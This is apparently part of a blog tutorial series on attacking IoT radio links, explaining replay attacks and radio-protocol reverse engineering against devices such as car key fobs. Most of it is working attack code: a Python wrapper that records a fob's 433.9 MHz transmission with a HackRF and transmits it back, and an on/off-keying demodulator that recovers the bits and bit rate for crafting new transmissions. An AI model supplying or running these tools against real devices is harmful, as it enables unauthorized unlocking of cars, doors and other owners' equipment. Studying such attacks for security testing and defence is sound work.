
IoT Radio Communication Attack by Blackhat Pakistan 2023

This is part 4 of the “IoT Radio Communication Attack” series. It is important that you read the other three articles to gain a good understanding of the material covered in this article.

What We’ll Learn – This article describes the attacks that can be mounted against the radio communication component of an IoT device: the methodology of each attack, the tools used, how the attack is carried out with them, and the theory behind it.

Radio Communication – First, let’s understand what radio communication is so that it is easy to understand how different attacks can occur. Look at the image below.

Pictured above are a car and the key fob that locks and unlocks it. Pressing a button on the fob locks or unlocks the car, depending on which button is pressed.

Each button press transmits a short burst of radio-frequency energy whose modulation encodes a sequence of bits. Those bits are what we recover when we reverse the radio communication (covered in a later article), and they carry the lock/unlock command: the car acts on the bit sequence it decodes, not on the physical button. Anyone who can record or decode that burst can therefore influence the car, which is what makes the attacks below possible.

Below are the attacks that can be performed on the radio communication component of any IoT device:

Replay Attack – This is the most common and the simplest attack, which is why attackers use it so often. As the name suggests, the original transmission is recorded and played back to the IoT device unchanged; the attacker does not need to understand the modulation or the content of the bits. It works only against receivers that accept the same transmission more than once, so a device that uses rolling (hopping) codes is not vulnerable to a plain replay of a code the receiver has already seen.
Tools used – HackRF, BladeRF, RTL-SDR, FUNcube dongle, GQRX, SDR#, URH etc.

Steps to perform the attack –

Capturing the original data transmitted to the IoT device – To capture the transmission, we use SDR hardware (referred to simply as “tools” in the rest of this article) such as HackRF, RTL-SDR, FUNcube dongle or BladeRF. Note that the RTL-SDR and the FUNcube dongle are receive-only; replaying the capture requires a transmit-capable device such as the HackRF or the BladeRF.


Finding the transmission frequency – Every IoT device transmits and receives on a specific frequency, so identifying that frequency is the first task. The quickest route is the device’s FCC ID: it is printed on the product label, and the public FCC filings for that ID (test reports and operational description) state the operating frequency. If no FCC ID is listed, find the frequency manually: open a waterfall display in GQRX or SDR# around the likely bands and press the button until the burst appears. Most consumer remotes and key fobs use the 315 MHz band (roughly 310–318 MHz, common in North America) or the 433.92 MHz ISM band (common in Europe and Asia); 868 MHz and 915 MHz are the next most likely.


Tuning the hardware – Once the frequency is known, tune the SDR to it as the centre frequency so that the transmission falls inside the captured bandwidth.
Capturing and replaying the data – With the device tuned, record the transmission to a file on the local computer while the button is pressed, then transmit that same file back on the same frequency to carry out the replay.



Among all the tools described in this article, HackRF is the most widely used. The scope of the article will thus be limited to the HackRF tool.

The screenshots in the original post show the two hackrf_transfer steps of the replay. In the first, the HackRF is tuned to a centre frequency of 433.9 MHz and the received I/Q samples are written to a raw file named connector.raw while the fob button is pressed. In the second, that same connector.raw is transmitted back by the HackRF on 433.9 MHz, which is what triggers the replay.

Note that 433.9 MHz is the tuning (centre) frequency, not the sample rate. The sample rate is chosen separately and must be identical for the capture and the replay; otherwise the playback is stretched or compressed in time and the receiver will not decode it.
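The record-then-replay procedure above, as an added example that is not code from the article or from the HackRF project: a small Python wrapper around the hackrf_transfer command line that builds the record and replay invocations, checks the capture before keying the transmitter, and converts file size back into capture duration. The sample rate, gain values and the 433.9 MHz centre frequency are assumptions chosen for a 433 MHz key fob; the byte strings used to exercise the checks are constructed, not real captures.

```python
"""Record a key-fob transmission with hackrf_transfer and replay it.

Added example, not code from the article or the HackRF project: a thin
wrapper around the hackrf_transfer CLI that builds the record and replay
command lines, checks the capture before transmitting, and turns file size
back into capture duration.  Frequency, sample rate and gains are assumed.
"""
import shutil
import struct
import subprocess
import sys

FREQ_HZ = 433_900_000     # centre frequency the article tunes to (433.9 MHz)
SAMPLE_RATE = 2_000_000   # 2 MS/s; assumed, and must be the same for -r and -t
BYTES_PER_SAMPLE = 2      # hackrf_transfer writes int8 I followed by int8 Q


def hackrf_rx_argv(path, freq_hz=FREQ_HZ, sample_rate=SAMPLE_RATE, seconds=5):
    """hackrf_transfer -r: receive into `path`; -n caps the number of samples."""
    return ["hackrf_transfer", "-r", path, "-f", str(freq_hz), "-s", str(sample_rate),
            "-n", str(sample_rate * seconds), "-l", "32", "-g", "20"]


def hackrf_tx_argv(path, freq_hz=FREQ_HZ, sample_rate=SAMPLE_RATE, tx_gain_db=40):
    """hackrf_transfer -t: transmit `path` once; -x is TX VGA gain, -a 1 enables the RF amp."""
    return ["hackrf_transfer", "-t", path, "-f", str(freq_hz), "-s", str(sample_rate),
            "-x", str(tx_gain_db), "-a", "1"]


def capture_duration_s(size_bytes, sample_rate=SAMPLE_RATE):
    """Seconds of air time that a raw file of `size_bytes` represents."""
    return size_bytes / BYTES_PER_SAMPLE / sample_rate


def _samples(data):
    return struct.unpack(f"{len(data)}b", data)


def capture_has_signal(data, min_peak=20):
    """False for empty, odd-length or noise-only captures.  An idle band at
    moderate gain sits within a few LSB of zero; a nearby fob press swings
    the 8-bit samples to tens of LSB or more (threshold is an assumption)."""
    if len(data) < 2 or len(data) % 2:
        return False
    return max(abs(v) for v in _samples(data)) >= min_peak


def capture_is_clipped(data, max_fraction=0.01):
    """True when more than max_fraction of samples sit at full scale (+/-127):
    the RX gain was too high and the waveform is distorted."""
    s = _samples(data)
    if not s:
        return False
    return sum(1 for v in s if abs(v) >= 127) / len(s) > max_fraction


def record(path, seconds=5):
    subprocess.run(hackrf_rx_argv(path, seconds=seconds), check=True)


def replay(path):
    with open(path, "rb") as f:
        data = f.read()
    if not capture_has_signal(data):
        raise RuntimeError("capture looks empty: press the fob while recording")
    if capture_is_clipped(data):
        raise RuntimeError("capture is clipped: lower -l/-g gain and re-record")
    print(f"replaying {capture_duration_s(len(data)):.2f} s on {FREQ_HZ / 1e6:.3f} MHz")
    subprocess.run(hackrf_tx_argv(path), check=True)


if __name__ == "__main__":
    # usage: python replay.py record connector.raw ; python replay.py replay connector.raw
    if len(sys.argv) != 3 or sys.argv[1] not in ("record", "replay"):
        sys.exit("usage: replay.py record|replay <file.raw>")
    if shutil.which("hackrf_transfer") is None:
        sys.exit("hackrf_transfer not found; install the HackRF host tools")
    (record if sys.argv[1] == "record" else replay)(sys.argv[2])
```

The two pre-flight checks are the ones that save the most time in practice: a capture taken before the button was pressed is all noise and replays nothing, and a capture taken with too much RX gain is clipped and often fails to decode at the receiver even though it looks fine on a waterfall.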

Cryptanalysis Attack – This is the article’s term for what is really reverse engineering of the radio protocol rather than cryptanalysis in the cryptographic sense: the communication flow is reversed so that the transmission is understood, not just replayed. The captured signal is analysed and demodulated to recover its binary content. This attack is harder to perform because it requires the exact bit sequence, the modulation scheme used (for example OOK/ASK or FSK) and the bit rate (baud rate) of the transmission; if the reconstructed data or the baud rate does not match what the receiver expects, the attack fails.
Tools used – HackRF, CC1111, RTL-SDR, SDR#, GNURadio, rfcat, Audacity, etc.

Steps to perform the attack –

Capture the original data that is transmitted to the IoT device – The procedure is the same as when launching a Replay Attack.
Data analysis and processing – The capture is inspected (for example in Audacity, URH or a GNU Radio flowgraph) to identify the modulation scheme. The signal is then demodulated, filtered to remove noise outside the channel, normalised in amplitude, and its bit rate is measured from the width of the shortest pulse.
Reverse Engineering – Once the data has been analysed and processed, the binary content of the transmission is known. With the bit sequence, the baud rate and the modulation in hand, the attacker re-modulates the data (or a modified version of it) and sends it to the IoT device to launch the actual attack. This kind of attack is considerably more complicated than a replay attack, but unlike a replay it lets the attacker craft transmissions that were never captured.
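The demodulation, bit-rate measurement and bit-recovery steps above, as an added example that is not code from the article or from any of the tools it lists. It targets on/off keying (OOK/ASK), the modulation most 315/433 MHz fobs and remotes use, and reads HackRF’s raw int8 interleaved I/Q format so it can be pointed at a file written by hackrf_transfer -r. The default input is a synthesised capture constructed inside the script; the sample rate, the 10 kHz tone offset, the message bits and the preamble layout are all assumptions.

```python
"""Recover bits and bit rate from an on/off-keyed HackRF raw I/Q capture.

Added example, not code from the article.  hackrf_transfer -r writes
interleaved signed 8-bit I and Q samples; this script loads that format,
computes the envelope, thresholds it into on/off levels, takes the shortest
run as the symbol period and rebuilds the bit string.  The default input is
synthesised here (constructed data, not a real recording).
"""
import math
import random
import struct
import sys

SAMPLE_RATE = 250_000   # Hz; assumed, must equal the -s value used when recording


def load_iq_int8(data):
    """Parse HackRF's raw format: int8 I, int8 Q, repeated."""
    usable = len(data) - len(data) % 2
    return list(struct.iter_unpack("bb", data[:usable]))


def envelope(iq):
    """Instantaneous amplitude: constant across a tone, near zero when the carrier is off."""
    return [math.hypot(i, q) for i, q in iq]


def to_levels(env):
    """Slice the envelope at the midpoint between its extremes (crude threshold)."""
    thr = (max(env) + min(env)) / 2
    return [1 if e > thr else 0 for e in env]


def run_lengths(levels):
    """Collapse a 0/1 sequence into (level, count) runs."""
    runs = []
    for lv in levels:
        if runs and runs[-1][0] == lv:
            runs[-1][1] += 1
        else:
            runs.append([lv, 1])
    return [tuple(r) for r in runs]


def demodulate_ook(iq, sample_rate):
    """Return (bit_string, baud).  Leading and trailing carrier-off idle is dropped."""
    runs = run_lengths(to_levels(envelope(iq)))
    while runs and runs[0][0] == 0:
        runs.pop(0)
    while runs and runs[-1][0] == 0:
        runs.pop()
    if not runs:
        raise ValueError("no transmission found in capture")
    # The shortest run is one symbol.  This assumes the frame contains at least
    # one isolated 1 and one isolated 0, which a 1010... preamble guarantees.
    samples_per_bit = min(n for _, n in runs)
    bits = "".join(str(lv) * round(n / samples_per_bit) for lv, n in runs)
    return bits, sample_rate / samples_per_bit


def synthesize_ook_capture(bits, sample_rate, baud, tone_hz=10_000, amp=100,
                           noise=2.0, gap_bits=8, seed=1):
    """Constructed test input: an OOK frame as HackRF int8 I/Q bytes.  The
    carrier sits tone_hz from centre and a little deterministic noise is added."""
    spb = round(sample_rate / baud)
    rng = random.Random(seed)
    out = bytearray()
    n = 0
    for b in "0" * gap_bits + bits + "0" * gap_bits:
        for _ in range(spb):
            if b == "1":
                ph = 2 * math.pi * tone_hz * n / sample_rate
                i, q = amp * math.cos(ph), amp * math.sin(ph)
            else:
                i = q = 0.0
            i += rng.uniform(-noise, noise)
            q += rng.uniform(-noise, noise)
            out += struct.pack("bb", max(-128, min(127, round(i))),
                               max(-128, min(127, round(q))))
            n += 1
    return bytes(out)


MESSAGE = "10101010" + "1101001100101011" + "1"  # assumed preamble + fixed code + stop bit

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:   # e.g. connector.raw from hackrf_transfer -r
            raw = f.read()
    else:
        raw = synthesize_ook_capture(MESSAGE, SAMPLE_RATE, baud=2000)
    bits, baud = demodulate_ook(load_iq_int8(raw), SAMPLE_RATE)
    print(f"{len(bits)} bits at {baud:.0f} baud: {bits}")
```

On a real 2 MS/s capture of several seconds this pure-Python loop is slow; decimate the samples first or move the envelope and threshold steps to numpy. Real fobs also repeat the frame several times per press, so the recovered bit string will normally contain the same code more than once, separated by idle gaps longer than any symbol; splitting the runs on those long gaps yields one frame per repetition.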
These are two types of attacks that are widely performed on the radio communication component of IoT devices. This article deals with the theory of these attacks. The next one will provide real examples of these kinds of attacks.

